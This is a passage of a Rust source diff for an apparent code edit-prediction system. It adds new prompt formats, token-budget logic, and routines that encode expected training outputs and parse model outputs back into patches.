+ path, + context, + editable_range, + cursor_offset, + ) + } + ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => { + seed_coder::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ) + } + ZetaFormat::v0226Hashline => hashline::write_cursor_excerpt_section( + prompt, + path, + context, + editable_range, + cursor_offset, + ), + ZetaFormat::V0304VariableEdit => { + v0304_variable_edit::write_cursor_excerpt_section(prompt, path, context, cursor_offset) + } + ZetaFormat::V0306SeedMultiRegions => { + prompt.push_str(&build_v0306_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0316SeedMultiRegions => { + prompt.push_str(&build_v0316_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0318SeedMultiRegions => { + prompt.push_str(&build_v0318_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + ZetaFormat::V0317SeedMultiRegions => { + prompt.push_str(&build_v0317_cursor_prefix( + path, + context, + editable_range, + cursor_offset, + )); + } + } +} + +fn build_v0306_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + section.push_str(seed_coder::START_MARKER); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section.push_str(seed_coder::SEPARATOR); + section +} + +fn build_v0316_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0316( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn build_v0318_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0318( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn build_v0317_cursor_prefix( + path: &Path, + context: &str, + editable_range: &Range, + cursor_offset: usize, +) -> String { + let mut section = String::new(); + let path_str = path.to_string_lossy(); + write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok(); + + section.push_str(&context[..editable_range.start]); + + let editable_text = &context[editable_range.clone()]; + let cursor_in_editable = cursor_offset - editable_range.start; + multi_region::write_editable_with_markers_v0317( + &mut section, + editable_text, + cursor_in_editable, + CURSOR_MARKER, + ); + + if !section.ends_with('\n') { + section.push('\n'); + } + section +} + +fn offset_range_to_row_range(text: &str, range: Range) -> Range { + let start_row = text[0..range.start].matches('\n').count() as u32; + let mut end_row = start_row + text[range.clone()].matches('\n').count() as u32; + if !text[..range.end].ends_with('\n') { + end_row += 1; + } + return start_row..end_row; +} + +pub fn format_prompt_with_budget_for_format( + input: &ZetaPromptInput, + format: ZetaFormat, + max_tokens: usize, +) -> Option { + let (context, editable_range, context_range, cursor_offset) = + resolve_cursor_region(input, format); + let path = &*input.cursor_path; + + let empty_files = Vec::new(); + let input_related_files = input.related_files.as_deref().unwrap_or(&empty_files); + let related_files = if let Some(cursor_excerpt_start_row) = input.excerpt_start_row { + let relative_row_range = offset_range_to_row_range(&input.cursor_excerpt, context_range); + let row_range = relative_row_range.start + cursor_excerpt_start_row + ..relative_row_range.end + cursor_excerpt_start_row; + &filter_redundant_excerpts( + input_related_files.to_vec(), + input.cursor_path.as_ref(), + row_range, + ) + } else { + input_related_files + }; + + let prompt = match format { + ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => { + let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( + format, &mut cursor_section, path, context, &editable_range, cursor_offset, + ); + + let budget_with_margin = apply_prompt_budget_margin(max_tokens); + seed_coder::assemble_fim_prompt( + context, + &editable_range, + &cursor_section, + &input.events, + related_files, + budget_with_margin, ) } - ZetaFormat::V0211SeedCoder => { - return seed_coder::format_prompt_with_budget( + _ => { + let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( + format, + &mut cursor_section, path, context, &editable_range, cursor_offset, + ); + + let mut remaining_budget = apply_prompt_budget_margin(max_tokens); + let cursor_tokens = estimate_tokens(cursor_section.len()); + remaining_budget = remaining_budget.saturating_sub(cursor_tokens); + + let edit_history_section = format_edit_history_within_budget( &input.events, - &input.related_files, - max_tokens, + "<|file_sep|>", + "edit history", + remaining_budget, + max_edit_event_count_for_format(&format), ); - } - } + let edit_history_tokens = estimate_tokens(edit_history_section.len()); + remaining_budget = remaining_budget.saturating_sub(edit_history_tokens); - let cursor_tokens = estimate_tokens(cursor_section.len()); - let budget_after_cursor = max_tokens.saturating_sub(cursor_tokens); + let related_files_section = format_related_files_within_budget( + &related_files, + "<|file_sep|>", + "", + remaining_budget, + ); - let edit_history_section = format_edit_history_within_budget( - &input.events, - "<|file_sep|>", - "edit history", - budget_after_cursor, - ); - let edit_history_tokens = estimate_tokens(edit_history_section.len()); - let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); - - let related_files_section = format_related_files_within_budget( - &input.related_files, - "<|file_sep|>", - "", - budget_after_edit_history, - ); + let mut prompt = String::new(); + prompt.push_str(&related_files_section); + prompt.push_str(&edit_history_section); + prompt.push_str(&cursor_section); + prompt + } + }; + let prompt_tokens = estimate_tokens(prompt.len()); + if prompt_tokens > max_tokens { + return None; + } + return Some(prompt); +} - let mut prompt = String::new(); - prompt.push_str(&related_files_section); - prompt.push_str(&edit_history_section); - prompt.push_str(&cursor_section); - prompt +pub fn filter_redundant_excerpts( + mut related_files: Vec, + cursor_path: &Path, + cursor_row_range: Range, +) -> Vec { + for file in &mut related_files { + if file.path.as_ref() == cursor_path { + file.excerpts.retain(|excerpt| { + excerpt.row_range.start < cursor_row_range.start + || excerpt.row_range.end > cursor_row_range.end + }); + } + } + related_files.retain(|file| !file.excerpts.is_empty()); + related_files } -pub fn get_prefill(input: &ZetaPromptInput, format: ZetaFormat) -> String { +pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize { match format { ZetaFormat::V0112MiddleAtEnd | ZetaFormat::V0113Ordered | ZetaFormat::V0114180EditableRegion | ZetaFormat::V0120GitMergeMarkers | ZetaFormat::V0131GitMergeMarkersPrefix - | ZetaFormat::V0211SeedCoder => String::new(), - ZetaFormat::V0211Prefill => { - let (context, editable_range, _) = resolve_cursor_region(input, format); - v0211_prefill::get_prefill(context, &editable_range) - } + | ZetaFormat::V0211Prefill + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0304VariableEdit + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => 6, } } -fn format_edit_history_within_budget( - events: &[Arc], - file_marker: &str, - edit_history_name: &str, - max_tokens: usize, +pub fn get_prefill_for_format( + format: ZetaFormat, + context: &str, + editable_range: &Range, ) -> String { - let header = format!("{}{}\n", file_marker, edit_history_name); - let header_tokens = estimate_tokens(header.len()); - if header_tokens >= max_tokens { - return String::new(); + match format { + ZetaFormat::V0211Prefill => v0211_prefill::get_prefill(context, editable_range), + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | ZetaFormat::V0120GitMergeMarkers + | ZetaFormat::V0131GitMergeMarkersPrefix + | ZetaFormat::V0211SeedCoder + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304VariableEdit => String::new(), + ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions + | ZetaFormat::V0316SeedMultiRegions + | ZetaFormat::V0318SeedMultiRegions + | ZetaFormat::V0317SeedMultiRegions => String::new(), } +} - let mut event_strings: Vec = Vec::new(); - let mut total_tokens = header_tokens; - - for event in events.iter().rev() { - let mut event_str = String::new(); - write_event(&mut event_str, event); - let event_tokens = estimate_tokens(event_str.len()); +pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str> { + match format { + ZetaFormat::V0120GitMergeMarkers => Some(v0120_git_merge_markers::END_MARKER), + ZetaFormat::V0131GitMergeMarkersPrefix => Some(v0131_git_merge_markers_prefix::END_MARKER), + ZetaFormat::V0211Prefill => Some(v0131_git_merge_markers_prefix::END_MARKER), + ZetaFormat::V0211SeedCoder + | ZetaFormat::V0304SeedNoEdits + | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER), + ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER), + ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER), + ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER), + ZetaFormat::V0112MiddleAtEnd + | ZetaFormat::V0113Ordered + | ZetaFormat::V0114180EditableRegion + | ZetaFormat::v0226Hashline + | ZetaFormat::V0304VariableEdit => None, + } +} - if total_tokens + event_tokens > max_tokens { - break; +pub fn encode_patch_as_output_for_format( + format: ZetaFormat, + old_editable_region: &str, + patch: &str, + cursor_offset: Option, +) -> Result> { + match format { + ZetaFormat::v0226Hashline => { + hashline::patch_to_edit_commands(old_editable_region, patch, cursor_offset).map(Some) } - total_tokens += event_tokens; - event_strings.push(event_str); + ZetaFormat::V0304VariableEdit => v0304_variable_edit::patch_to_variable_edit_output( + old_editable_region, + patch, + cursor_offset, + ) + .map(Some), + ZetaFormat::V0304SeedNoEdits | ZetaFormat::V0306SeedMultiRegions => { + Ok(seed_coder::no_edits(patch)) + } + ZetaFormat::V0316SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let marker_offsets = multi_region::compute_marker_offsets(old_editable_region); + let marker_num = + multi_region::nearest_marker_number(cursor_offset, &marker_offsets); + let tag = multi_region::marker_tag(marker_num); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0316_END_MARKER + ))) + } else { + Ok(None) + } + } + ZetaFormat::V0318SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let marker_offsets = + multi_region::compute_marker_offsets_v0318(old_editable_region); + let marker_num = + multi_region::nearest_marker_number(cursor_offset, &marker_offsets); + let tag = multi_region::marker_tag(marker_num); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0318_END_MARKER + ))) + } else { + Ok(None) + } + } + ZetaFormat::V0317SeedMultiRegions => { + let empty_patch = patch.lines().count() <= 3; + if empty_patch { + let tag = multi_region::marker_tag_relative(0); + Ok(Some(format!( + "{tag}{tag}{}", + multi_region::V0317_END_MARKER + ))) + } else { + Ok(None) + } + } + _ => Ok(None), } +} - if event_strings.is_empty() { - return String::new(); +/// Given a `ZetaPromptInput`, a format, and a patch (with cursor already +/// extracted), produce the expected model output string for training. +pub fn format_expected_output( + input: &ZetaPromptInput, + format: ZetaFormat, + patch: &str, + cursor_offset: Option, +) -> Result { + let (context, editable_range, _, _) = resolve_cursor_region(input, format); + let mut old_editable = context[editable_range].to_string(); + if !old_editable.is_empty() && !old_editable.ends_with('\n') { + old_editable.push('\n'); } - let mut result = header; - for event_str in event_strings.iter().rev() { - result.push_str(event_str); + // Formats with their own output encoding (hashline, variable-edit, + // multi-region empty patches) are handled here. + if let Some(output) = + encode_patch_as_output_for_format(format, &old_editable, patch, cursor_offset)? + { + return Ok(output); } - result -} - -fn excerpt_rendered_tokens(excerpt: &RelatedExcerpt, file_max_row: u32) -> usize { - let needs_newline = !excerpt.text.ends_with('\n'); - let needs_ellipsis = excerpt.row_range.end < file_max_row; - let len = excerpt.text.len() - + if needs_newline { "\n".len() } else { 0 } - + if needs_ellipsis { "...\n".len() } else { 0 }; - estimate_tokens(len) -} -pub fn format_related_files_within_budget( - related_files: &[RelatedFile], - file_prefix: &str, - file_suffix: &str, - max_tokens: usize, -) -> String { - struct ExcerptCandidate { - file_ix: usize, - excerpt_ix: usize, - order: usize, - } + let empty_patch = patch.lines().count() <= 3; + + match format { + // Multi-region formats: non-empty patches need diff application + // then marker-span encoding. + ZetaFormat::V0316SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0316( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0316_END_MARKER, + ) + } + ZetaFormat::V0318SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0318( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0318_END_MARKER, + ) + } + ZetaFormat::V0317SeedMultiRegions => { + let (new_editable, first_hunk_offset) = + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)?; + let cursor_in_new = cursor_in_new_text(cursor_offset, first_hunk_offset, &new_editable); + multi_region::encode_from_old_and_new_v0317( + &old_editable, + &new_editable, + cursor_in_new, + CURSOR_MARKER, + multi_region::V0317_END_MARKER, + ) + } + // V0131-style formats and fallback: produce new editable text with + // cursor marker inserted, followed by the end marker. + _ => { + let (mut result, first_hunk_offset) = if empty_patch { + (old_editable.clone(), None) + } else { + udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable)? + }; + + if let Some(cursor) = cursor_offset { + let hunk_start = if !empty_patch { + first_hunk_offset.unwrap_or(0) + } else { + 0 + }; + let offset = (hunk_start + cursor).min(result.len()); + result.insert_str(offset, CURSOR_MARKER); + } + + if !result.is_empty() && !result.ends_with('\n') { + result.push('\n'); + } + + if let Some(end_marker) = output_end_marker_for_format(format) { + result.push_str(end_marker); + } + + Ok(result) + } + } +} + +/// Compute the cursor position within the new text after diff application. +fn cursor_in_new_text( + cursor_offset: Option, + first_hunk_offset: Option, + new_text: &str, +) -> Option { + cursor_offset.map(|cursor| { + let hunk_start = first_hunk_offset.unwrap_or(0); + (hunk_start + cursor).min(new_text.len()) + }) +} + +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] +pub struct ParsedOutput { + /// Text that should replace the editable region + pub new_editable_region: String, + /// The byte range within `cursor_excerpt` that this replacement applies to + pub range_in_excerpt: Range, + /// Byte offset of the cursor marker within `new_editable_region`, if present + pub cursor_offset_in_new_editable_region: Option, +} + +#[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] +pub struct CursorPosition { + pub path: String, + pub row: usize, + pub column: usize, + pub offset: usize, + pub editable_region_offset: usize, +} + +pub fn parsed_output_from_editable_region( + range_in_excerpt: Range, + mut new_editable_region: String, +) -> ParsedOutput { + let cursor_offset_in_new_editable_region = new_editable_region.find(CURSOR_MARKER); + if let Some(offset) = cursor_offset_in_new_editable_region { + new_editable_region.replace_range(offset..offset + CURSOR_MARKER.len(), ""); + } + + ParsedOutput { + new_editable_region, + range_in_excerpt, + cursor_offset_in_new_editable_region, + } +} + +/// Parse model output for the given zeta format +pub fn parse_zeta2_model_output( + output: &str, + format: ZetaFormat, + prompt_inputs: &ZetaPromptInput, +) -> Result { + let output = match output_end_marker_for_format(format) { + Some(marker) => output.strip_suffix(marker).unwrap_or(output), + None => output, + }; + + let (context, editable_range_in_context, context_range, cursor_offset) = + resolve_cursor_region(prompt_inputs, format); + let context_start = context_range.start; + let old_editable_region = &context[editable_range_in_context.clone()]; + let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range_in_context.start); + + let (range_in_context, output) = match format { + ZetaFormat::v0226Hashline => ( + editable_range_in_context, + if hashline::output_has_edit_commands(output) { + hashline::apply_edit_commands(old_editable_region, output) + } else { + output.to_string() + }, + ), + ZetaFormat::V0304VariableEdit => v0304_variable_edit::apply_variable_edit(context, output)?, + ZetaFormat::V0304SeedNoEdits => ( + editable_range_in_context, + if output.starts_with(seed_coder::NO_EDITS) { + old_editable_region.to_string() + } else { + output.to_string() + }, + ), + ZetaFormat::V0306SeedMultiRegions => ( + editable_range_in_context, + if output.starts_with(seed_coder::NO_EDITS) { + old_editable_region.to_string() + } else { + multi_region::apply_marker_span(old_editable_region, output)? + }, + ), + ZetaFormat::V0316SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0316(old_editable_region, output)?, + ), + ZetaFormat::V0318SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0318(old_editable_region, output)?, + ), + ZetaFormat::V0317SeedMultiRegions => ( + editable_range_in_context, + multi_region::apply_marker_span_v0317( + old_editable_region, + output, + Some(cursor_offset_in_editable), + )?, + ), + _ => (editable_range_in_context, output.to_string()), + }; + + let range_in_excerpt = + range_in_context.start + context_start..range_in_context.end + context_start; + + Ok(parsed_output_from_editable_region(range_in_excerpt, output)) +} + +pub fn parse_zeta2_model_output_as_patch( + output: &str, + format: ZetaFormat, + prompt_inputs: &ZetaPromptInput, +) -> Result { + let parsed = parse_zeta2_model_output(output, format, prompt_inputs)?; + parsed_output_to_patch(prompt_inputs, parsed) +} + +pub fn cursor_position_from_parsed_output( + prompt_inputs: &ZetaPromptInput, + parsed: &ParsedOutput, +) -> Option { + let cursor_offset = parsed.cursor_offset_in_new_editable_region?; + let editable_region_offset = parsed.range_in_excerpt.start; + let excerpt = prompt_inputs.cursor_excerpt.as_ref(); + + let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count(); + + let new_editable_region = &parsed.new_editable_region; + let prefix_end = cursor_offset.min(new_editable_region.len()); + let new_region_prefix = &new_editable_region[..prefix_end]; + + let row = editable_region_start_line + new_region_prefix.matches('\n').count(); + + let column = match new_region_prefix.rfind('\n') { + Some(last_newline) => cursor_offset - last_newline - 1, + None => { + let content_prefix = &excerpt[..editable_region_offset]; + let content_column = match content_prefix.rfind('\n') { + Some(last_newline) => editable_region_offset - last_newline - 1, + None => editable_region_offset, + }; + content_column + cursor_offset + } + }; + + Some(CursorPosition { + path: prompt_inputs.cursor_path.to_string_lossy().into_owned(), + row, + column, + offset: editable_region_offset + cursor_offset, + editable_region_offset: cursor_offset, + }) +} + +pub fn parsed_output_to_patch( + prompt_inputs: &ZetaPromptInput, + parsed: ParsedOutput, +) -> Result { + let range_in_excerpt = parsed.range_in_excerpt; + let excerpt = prompt_inputs.cursor_excerpt.as_ref(); + let old_text = excerpt[range_in_excerpt.clone()].to_string(); + let mut new_text = parsed.new_editable_region; + + let mut old_text_normalized = old_text; + if !new_text.is_empty() && !new_text.ends_with('\n') { + new_text.push('\n'); + } + if !old_text_normalized.is_empty() && !old_text_normalized.ends_with('\n') { + old_text_normalized.push('\n'); + } + + let editable_region_offset = range_in_excerpt.start; + let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count() as u32; + let editable_region_lines = old_text_normalized.lines().count() as u32; + + let diff = udiff::unified_diff_with_context( + &old_text_normalized, + &new_text, + editable_region_start_line, + editable_region_start_line, + editable_region_lines, + ); + + let path = prompt_inputs + .cursor_path + .to_string_lossy() + .trim_start_matches('/') + .to_string(); + let formatted_diff = format!("--- a/{path}\n+++ b/{path}\n{diff}"); + + Ok(udiff::encode_cursor_in_patch( + &formatted_diff, + parsed.cursor_offset_in_new_editable_region, + )) +} + +pub fn excerpt_range_for_format( + format: ZetaFormat, + ranges: &ExcerptRanges, +) -> (Range, Range) { + excerpt_ranges_for_format(format, ranges) +} + +pub fn resolve_cursor_region( + input: &ZetaPromptInput, + format: ZetaFormat, +) -> (&str, Range, Range, usize) { + let (editable_range, context_range) = if let Some(syntax_ranges) = &input.syntax_ranges { + let (editable_tokens, context_tokens) = token_limits_for_format(format); + compute_editable_and_context_ranges( + &input.cursor_excerpt, + input.cursor_offset_in_excerpt, + syntax_ranges, + editable_tokens, + context_tokens, + ) + } else { + excerpt_range_for_format(format, &input.excerpt_ranges) + }; + let context_start = context_range.start; + let context_text = &input.cursor_excerpt[context_range.clone()]; + let adjusted_editable = + (editable_range.start - context_start)..(editable_range.end - context_start); + let adjusted_cursor = input.cursor_offset_in_excerpt - context_start; + + ( + context_text, + adjusted_editable, + context_range, + adjusted_cursor, + ) +} + +pub fn get_prefill(input: &ZetaPromptInput, format: ZetaFormat) -> String { + let (context, editable_range, _, _) = resolve_cursor_region(input, format); + get_prefill_for_format(format, context, &editable_range) +} + +fn format_edit_history_within_budget( + events: &[Arc], + file_marker: &str, + edit_history_name: &str, + max_tokens: usize, + max_edit_event_count: usize, +) -> String { + let header = format!("{}{}\n", file_marker, edit_history_name); + let header_tokens = estimate_tokens(header.len()); + if header_tokens >= max_tokens { + return String::new(); + } + + let mut event_strings: Vec = Vec::new(); + let mut total_tokens = header_tokens; + + for event in events.iter().rev().take(max_edit_event_count) { + let mut event_str = String::new(); + write_event(&mut event_str, event); + let event_tokens = estimate_tokens(event_str.len()); + + if total_tokens + event_tokens > max_tokens { + break; + } + total_tokens += event_tokens; + event_strings.push(event_str); + } + + if event_strings.is_empty() { + return String::new(); + } + + let mut result = header; + for event_str in event_strings.iter().rev() { + result.push_str(event_str); + } + result +} + +fn excerpt_rendered_tokens(excerpt: &RelatedExcerpt, file_max_row: u32) -> usize { + let needs_newline = !excerpt.text.ends_with('\n'); + let needs_ellipsis = excerpt.row_range.end < file_max_row; + let len = excerpt.text.len() + + if needs_newline { "\n".len() } else { 0 } + + if needs_ellipsis { "...\n".len() } else { 0 }; + estimate_tokens(len) +} + +pub fn format_related_files_within_budget( + related_files: &[RelatedFile], + file_prefix: &str, + file_suffix: &str, + max_tokens: usize, +) -> String { + struct ExcerptCandidate { + file_ix: usize, + excerpt_ix: usize, + order: usize, + } let mut excerpt_candidates: Vec = related_files .iter() @@ -547,6 +1333,16 @@ pub fn write_related_files( mod v0112_middle_at_end { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + pub fn write_cursor_excerpt_section( prompt: &mut String, path: &Path, @@ -581,6 +1377,16 @@ mod v0112_middle_at_end { mod v0113_ordered { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + &[ + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + "<|file_sep|>", + CURSOR_MARKER, + ] + } + pub fn write_cursor_excerpt_section( prompt: &mut String, path: &Path, @@ -615,6 +1421,14 @@ mod v0113_ordered { } } +mod v0114180_editable_region { + use super::*; + + pub fn special_tokens() -> &'static [&'static str] { + v0113_ordered::special_tokens() + } +} + pub mod v0120_git_merge_markers { //! A prompt that uses git-style merge conflict markers to represent the editable region. //! @@ -766,6 +1580,10 @@ pub mod v0131_git_merge_markers_prefix { pub mod v0211_prefill { use super::*; + pub fn special_tokens() -> &'static [&'static str] { + v0131_git_merge_markers_prefix::special_tokens() + } + pub fn get_prefill(context: &str, editable_range: &Range) -> String { let editable_region = &context[editable_range.start..editable_range.end]; @@ -797,149 +1615,2656 @@ pub mod v0211_prefill { } } -pub mod seed_coder { - //! Seed-Coder prompt format using SPM (Suffix-Prefix-Middle) FIM mode. - //! - //! Seed-Coder uses different FIM tokens and order than Qwen: - //! - SPM order: suffix comes FIRST, then prefix, then middle - //! - Tokens: `<[fim-suffix]>`, `<[fim-prefix]>`, `<[fim-middle]>` - //! - File markers: StarCoder-style `path` (single token + path) - //! - //! All context (related files, edit history) goes in the PREFIX section. - //! The suffix contains only code after the editable region. - //! - //! Example prompt: - //! - //! <[fim-suffix]> - //! code after editable region - //! <[fim-prefix]>related/file.py - //! related file content - //! - //! edit_history - //! --- a/some_file.py - //! +++ b/some_file.py - //! -old - //! +new - //! - //! path/to/target_file.py - //! code before editable region - //! <<<<<<< CURRENT - //! code that - //! needs to<|user_cursor|> - //! be rewritten - //! ======= - //! <[fim-middle]> - //! - //! Expected output (model generates): - //! - //! updated - //! code with - //! changes applied - //! >>>>>>> UPDATED +pub mod hashline { - use super::*; + use std::fmt::Display; - pub const FIM_SUFFIX: &str = "<[fim-suffix]>"; - pub const FIM_PREFIX: &str = "<[fim-prefix]>"; - pub const FIM_MIDDLE: &str = "<[fim-middle]>"; - pub const FILE_MARKER: &str = ""; + pub const END_MARKER: &str = "<|fim_middle|>updated"; + pub const START_MARKER: &str = "<|fim_middle|>current"; - pub const START_MARKER: &str = "<<<<<<< CURRENT\n"; - pub const SEPARATOR: &str = "=======\n"; - pub const END_MARKER: &str = ">>>>>>> UPDATED\n"; + use super::*; + + const SET_COMMAND_MARKER: &str = "<|set|>"; + const INSERT_COMMAND_MARKER: &str = "<|insert|>"; + pub const NO_EDITS_COMMAND_MARKER: &str = "<|no_edits|>"; pub fn special_tokens() -> &'static [&'static str] { - &[ - FIM_SUFFIX, - FIM_PREFIX, - FIM_MIDDLE, - FILE_MARKER, - START_MARKER, - SEPARATOR, - END_MARKER, + return &[ + SET_COMMAND_MARKER, + "<|set_range|>", + INSERT_COMMAND_MARKER, + NO_EDITS_COMMAND_MARKER, CURSOR_MARKER, - ] + "<|file_sep|>", + "<|fim_prefix|>", + "<|fim_suffix|>", + "<|fim_middle|>", + ]; } - pub fn format_prompt_with_budget( + /// A parsed line reference like `3:c3` (line index 3 with hash 0xc3). + #[derive(Debug, Clone, PartialEq, Eq)] + struct LineRef { + index: usize, + hash: u8, + } + + impl Display for LineRef { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + write!(f, "{}:{:02x}", self.index, self.hash) + } + } + + pub fn hash_line(line: &[u8]) -> u8 { + let mut h: u8 = 0; + for &byte in line { + h = h.wrapping_add(byte); + } + return h; + } + + /// Write the hashline-encoded editable region into `out`. Each line of + /// `editable_text` is prefixed with `{line_index}:{hash}|` and the cursor + /// marker is inserted at `cursor_offset_in_editable` (byte offset relative + /// to the start of `editable_text`). + pub fn write_hashline_editable_region( + out: &mut String, + editable_text: &str, + cursor_offset_in_editable: usize, + ) { + let mut offset = 0; + for (i, line) in editable_text.lines().enumerate() { + let (head, cursor, tail) = if cursor_offset_in_editable > offset + && cursor_offset_in_editable < offset + line.len() + { + ( + &line[..cursor_offset_in_editable - offset], + CURSOR_MARKER, + &line[cursor_offset_in_editable - offset..], + ) + } else { + (line, "", "") + }; + write!( + out, + "\n{}|{head}{cursor}{tail}", + LineRef { + index: i, + hash: hash_line(line.as_bytes()) + } + ) + .unwrap(); + offset += line.len() + 1; + } + } + + pub fn write_cursor_excerpt_section( + prompt: &mut String, path: &Path, context: &str, editable_range: &Range, cursor_offset: usize, - events: &[Arc], - related_files: &[RelatedFile], + ) { + let path_str = path.to_string_lossy(); + write!(prompt, "<|file_sep|>{}\n", path_str).ok(); + + prompt.push_str("<|fim_prefix|>\n"); + prompt.push_str(&context[..editable_range.start]); + prompt.push_str(START_MARKER); + + let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range.start); + let editable_region = &context[editable_range.clone()]; + write_hashline_editable_region(prompt, editable_region, cursor_offset_in_editable); + + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + + prompt.push_str("<|fim_suffix|>\n"); + prompt.push_str(&context[editable_range.end..]); + if !prompt.ends_with('\n') { + prompt.push('\n'); + } + + prompt.push_str(END_MARKER); + prompt.push('\n'); + } + + /// A single edit command parsed from the model output. + #[derive(Debug)] + enum EditCommand<'a> { + /// Replace a range of lines (inclusive on both ends). Single-line set is + /// represented by `start == end`. + Set { + start: LineRef, + end: LineRef, + content: &'a str, + }, + /// Insert new lines after the given line, or before the first line if + /// `after` is `None`. + Insert { + after: Option, + content: &'a str, + }, + } + + /// Parse a line reference like `3:c3` into a `LineRef`. + fn parse_line_ref(s: &str) -> Option { + let (idx_str, hash_str) = s.split_once(':')?; + let index = idx_str.parse::().ok()?; + let hash = u8::from_str_radix(hash_str, 16).ok()?; + Some(LineRef { index, hash }) + } + + /// Parse the model output into a list of `EditCommand`s. + fn parse_edit_commands(model_output: &str) -> Vec> { + let mut commands = Vec::new(); + let mut offset = 0usize; + + while offset < model_output.len() { + let next_nl = model_output[offset..] + .find('\n') + .map(|i| offset + i) + .unwrap_or(model_output.len()); + let line = &model_output[offset..next_nl]; + let line_end = if next_nl < model_output.len() { + next_nl + 1 + } else { + next_nl + }; + + let trimmed = line.trim(); + let (is_set, specifier) = if let Some(spec) = trimmed.strip_prefix(SET_COMMAND_MARKER) { + (true, spec) + } else if let Some(spec) = trimmed.strip_prefix(INSERT_COMMAND_MARKER) { + (false, spec) + } else { + offset = line_end; + continue; + }; + + let mut content_end = line_end; + let mut scan = line_end; + + while scan < model_output.len() { + let body_nl = model_output[scan..] + .find('\n') + .map(|i| scan + i) + .unwrap_or(model_output.len()); + let body_line = &model_output[scan..body_nl]; + if body_line.trim().starts_with(SET_COMMAND_MARKER) + || 